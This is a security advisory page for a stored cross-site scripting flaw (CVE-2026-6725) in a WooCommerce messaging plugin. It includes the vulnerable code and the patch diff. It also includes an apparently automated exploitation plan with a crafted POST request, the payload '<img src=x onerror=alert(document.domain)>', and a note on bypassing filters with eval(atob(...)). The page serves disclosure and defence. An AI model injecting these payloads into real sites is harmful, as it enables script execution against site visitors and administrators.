WP-Safety
CVE-2026-6725

WPC Smart Messages for WooCommerce <= 4.2.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attribute

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
4.2.9
Patched in
1d
Time to patch

Description

The WPC Smart Messages for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'text' attribute of the `wpcsm_text_rotator` shortcode in all versions up to, and including, 4.2.8. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=4.2.8
PublishedApril 27, 2026
Last updatedApril 28, 2026
Affected pluginwpc-smart-messages

What Changed in the Fix

Changes introduced in v4.2.9

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v4.2.8
Browse source Download .zip
Patched v4.2.9
Browse source Download .zip
Research Plan
Unverified

# Vulnerability Research Plan: CVE-2026-6725 (WPC Smart Messages Stored XSS) ## 1. Vulnerability Summary The **WPC Smart Messages for WooCommerce** plugin (<= 4.2.8) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `text` attribute of the `[wpcsm_text_rotator]` shortcode. The plugin f…

Show full research plan

Vulnerability Research Plan: CVE-2026-6725 (WPC Smart Messages Stored XSS)

1. Vulnerability Summary

The WPC Smart Messages for WooCommerce plugin (<= 4.2.8) is vulnerable to Stored Cross-Site Scripting (XSS) via the text attribute of the [wpcsm_text_rotator] shortcode. The plugin fails to sanitize or escape the user-supplied content of this attribute before rendering it on the page. This allows an authenticated attacker with Contributor-level permissions or higher to embed malicious scripts into posts or pages, which will execute in the context of any user viewing the content.

2. Attack Vector Analysis

  • Endpoint: WordPress Post/Page Editor (standard wp-admin/post.php or wp-admin/post-new.php).
  • Shortcode: [wpcsm_text_rotator]
  • Vulnerable Parameter: The text attribute within the shortcode.
  • Authentication: Required (Contributor role or higher).
  • Preconditions: WooCommerce must be installed and active (plugin dependency).

3. Code Flow

  1. Registration: In includes/class-shortcode.php, the init() method registers the shortcode:
    add_shortcode( 'wpcsm_text_rotator', [ $this, 'text_rotator' ] );
  2. Processing: When a page containing the shortcode is rendered, WordPress calls the text_rotator($attrs) method in Wpcsm_Shortcode (found in includes/class-shortcode.php).
  3. Handling Attributes: The function extracts attributes, including text.
  4. Splitting Logic (Inferred): Based on the plugin's description in self::$shortcodes, the text attribute is split by commas:
    "text split by a comma"
  5. The Sink (Inferred): The code likely loops through the split strings and returns them wrapped in HTML tags without calling esc_html() or esc_attr(). 
    // Likely vulnerable logic:
$texts = explode(',', $atts['text']);
foreach($texts as $t) {
    $output .= '<div class="wpcsm-text-item">' . $t . '</div>'; // SINK: Unescaped variable $t
}

4. Nonce Acquisition Strategy

This vulnerability is exploited by saving a standard WordPress post/page. There is no specific plugin-level nonce for the shortcode rendering itself, but a standard WordPress _wpnonce is required to save a post.

Strategy for the Automated Agent:

  1. Log in to the WordPress dashboard as a Contributor.
  2. Navigate to wp-admin/post-new.php.
  3. Extract the _wpnonce and post_ID from the HTML form.
    • Nonce Location: input[name="_wpnonce"]
    • Post ID Location: input[name="post_ID"]
  4. Use these to send the editpost request via http_request.

5. Exploitation Strategy

The exploit involves creating a post with a malicious shortcode attribute.

Step-by-Step Plan:

  1. Login: Authenticate as a Contributor.
  2. Identify Target: Access wp-admin/post-new.php to obtain a post_ID (WordPress creates an auto-draft).
  3. Craft Payload:
    • The payload must avoid commas (as the plugin splits by comma).
    • Payload: <img src=x onerror=alert(document.domain)>
    • Full Shortcode: [wpcsm_text_rotator text="<img src=x onerror=alert(document.domain)>"]
  4. Submit Injection: Send an HTTP POST request to wp-admin/post.php.

HTTP Request Details (Example):

POST /wp-admin/post.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=editpost&
_wpnonce=[EXTRACTED_NONCE]&
post_ID=[POST_ID]&
post_title=Test+XSS&
post_type=post&
content=%5Bwpcsm_text_rotator+text%3D%22%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E%22%5D&
publish=Publish

6. Test Data Setup

  1. Install WooCommerce: Ensure WooCommerce is installed and active.
  2. Create User:
    wp user create attacker attacker@example.com --role=contributor --user_pass=password
  3. Verify Plugin Version: Ensure wpc-smart-messages version is <= 4.2.8.

7. Expected Results

  • When the post is saved, the database will store the shortcode literally.
  • When an administrator or any visitor navigates to the published post's URL, the browser will receive the raw <img src=x onerror=alert(document.domain)> tag inside the text rotator container.
  • An alert box displaying the document domain will appear.

8. Verification Steps

  1. Database Check: Verify the shortcode is stored.
    wp post get [POST_ID] --field=post_content
  2. Response Body Check: Fetch the frontend URL of the post and search for the unescaped payload.
    # Use the agent to fetch the page and check for:
# <img src=x onerror=alert(document.domain)>

9. Alternative Approaches

  • Attribute Breakout: If the animation attribute is also unescaped, try breaking out of the data-animation attribute:
    [wpcsm_text_rotator animation='"><script>alert(1)</script>' text='test']
  • Smart Messages CPT: Check if the plugin allows Contributors to create "Smart Messages" via the wpcsm_message custom post type. If so, inject the shortcode directly into the Message field (includes/class-backend.php:878).
  • Complex Payloads: If complex JS is needed (which requires commas), use eval(atob('...')) to bypass the explode(',', ...) logic.
Research Findings
Static analysis — not yet PoC-verified

Summary

The WPC Smart Messages for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'text' attribute of the wpcsm_text_rotator and wpcsm_live_number shortcodes. In versions up to 4.2.8, the plugin fails to sanitize or escape user-supplied attributes before rendering them, allowing authenticated attackers with contributor-level permissions to inject malicious scripts that execute in the context of any user viewing the page.

Vulnerable Code

// includes/class-shortcode.php (around line 456)
$output .= '<span class="wpcsm-text-rotator" data-animation="' . esc_attr( $attrs['animation'] ) . '" data-speed="' . esc_attr( $attrs['speed'] ) . '">' . $attrs['text'] . '</span>';

---

// includes/class-shortcode.php (around line 487)
$output .= sprintf( $attrs['text'], '<span class="wpcsm-number-rotator-value wpcsm-text-rotator" data-animation="' . esc_attr( $attrs['animation'] ) . '" data-speed="' . esc_attr( $attrs['duration'] ) . '">' . implode( ', ', $rand_values ) . '</span>' );

---

// includes/class-shortcode.php (around line 491)
$output .= sprintf( $attrs['text'], '<span class="wpcsm-live-number-value">' . $rand . '</span>' );

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/wpc-smart-messages/4.2.8/includes/class-shortcode.php /home/deploy/wp-safety.org/data/plugin-versions/wpc-smart-messages/4.2.9/includes/class-shortcode.php
--- /home/deploy/wp-safety.org/data/plugin-versions/wpc-smart-messages/4.2.8/includes/class-shortcode.php	2026-03-28 06:48:48.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/wpc-smart-messages/4.2.9/includes/class-shortcode.php	2026-04-21 02:58:20.000000000 +0000
@@ -456,7 +456,7 @@
 				'animation' => 'dissolve' //dissolve (default), fade, flip, flipUp, flipCube, flipCubeUp and spin
 			], $attrs );
 
-			$output .= '<span class="wpcsm-text-rotator" data-animation="' . esc_attr( $attrs['animation'] ) . '" data-speed="' . esc_attr( $attrs['speed'] ) . '">' . $attrs['text'] . '</span>';
+			$output .= '<span class="wpcsm-text-rotator" data-animation="' . esc_attr( $attrs['animation'] ) . '" data-speed="' . esc_attr( $attrs['speed'] ) . '">' . esc_html( $attrs['text'] ) . '</span>';
 
 			return apply_filters( 'wpcsm_shortcode_live_number', $output, $attrs );
 		}
@@ -484,11 +484,11 @@
 				}
 
 				$output .= '<span class="wpcsm-number-rotator">';
-				$output .= sprintf( $attrs['text'], '<span class="wpcsm-number-rotator-value wpcsm-text-rotator" data-animation="' . esc_attr( $attrs['animation'] ) . '" data-speed="' . esc_attr( $attrs['duration'] ) . '">' . implode( ', ', $rand_values ) . '</span>' );
+				$output .= sprintf( esc_html( $attrs['text'] ), '<span class="wpcsm-number-rotator-value wpcsm-text-rotator" data-animation="' . esc_attr( $attrs['animation'] ) . '" data-speed="' . esc_attr( $attrs['duration'] ) . '">' . implode( ', ', $rand_values ) . '</span>' );
 				$output .= '</span>';
 			} else {
 				$output .= '<span class="wpcsm-live-number" data-val="' . esc_attr( $rand ) . '" data-min="' . esc_attr( $attrs['min'] ) . '" data-max="' . esc_attr( $attrs['max'] ) . '" data-step="' . esc_attr( $attrs['step'] ) . '" data-duration="' . esc_attr( $attrs['duration'] ) . '" data-text="' . esc_attr( $attrs['text'] ) . '">';
-				$output .= sprintf( $attrs['text'], '<span class="wpcsm-live-number-value">' . $rand . '</span>' );
+				$output .= sprintf( esc_html( $attrs['text'] ), '<span class="wpcsm-live-number-value">' . $rand . '</span>' );
 				$output .= '</span>';
 			}

Exploit Outline

The exploit is executed by an authenticated user with Contributor-level access or higher. 1. The attacker logs into the WordPress dashboard and begins creating or editing a post or page. 2. In the post content, the attacker inserts the shortcode `[wpcsm_text_rotator text="<img src=x onerror=alert(document.domain)>"]`. Alternatively, the `[wpcsm_live_number]` shortcode can be used similarly with malicious content in its `text` attribute. 3. Upon saving and publishing the post, WordPress stores the shortcode literal. 4. When any user (including an administrator) visits the page on the frontend, the plugin processes the shortcode and outputs the raw HTML from the `text` attribute into the page source without escaping. This triggers the execution of the arbitrary JavaScript payload.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/9c1ac689-329a-4459-8b67-176e959cc02d?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database